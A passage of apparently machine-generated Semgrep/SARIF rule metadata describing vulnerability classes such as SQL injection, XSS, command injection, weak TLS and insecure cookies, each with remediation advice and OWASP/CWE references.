browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","id":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","name":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path","id":"cpp.lang.security.system-command.command-injection-path.command-injection-path","name":"cpp.lang.security.system-command.command-injection-path.command-injection-path","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.command-injection-path.command-injection-path"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url)\n - [https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html](https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","id":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","name":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","id":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","name":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","HIGH CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"help":{"markdown":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version)\n - [https://www.acunetix.com/blog/web-security-zone/hardening-nginx/](https://www.acunetix.com/blog/web-security-zone/hardening-nginx/)\n - [https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/](https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/)\n","text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version","id":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","name":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-ssl-version.insecure-ssl-version"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"help":{"markdown":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql)\n - [https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL](https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL)\n","text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","id":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","name":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","id":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","name":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","id":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","name":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"help":{"markdown":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5","id":"clojure.lang.security.use-of-md5.use-of-md5","name":"clojure.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","id":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","name":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pgx-sqli.pgx-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"help":{"markdown":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","id":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","name":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"help":{"markdown":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint)\n - [https://docs.angularjs.org/api/ng/function/angular.element](https://docs.angularjs.org/api/ng/function/angular.element)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","id":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","name":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"help":{"markdown":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","id":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","name":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","properties":{"precision":"very-high","tags":["CWE-296: Improper Following of a Certificate's Chain of Trust","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password","id":"go.secrets.pg.pg-empty-password.pg-empty-password","name":"go.secrets.pg.pg-empty-password.pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pg.pg-empty-password.pg-empty-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","id":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","name":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"help":{"markdown":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.Request](https://docs.python.org/3/library/urllib.request.html#urllib.request.Request)\n","text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","id":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","name":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"help":{"markdown":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate)\n - [https://www.php.net/manual/en/function.openssl-decrypt.php](https://www.php.net/manual/en/function.openssl-decrypt.php)\n","text":"The function `openssl_decrypt` 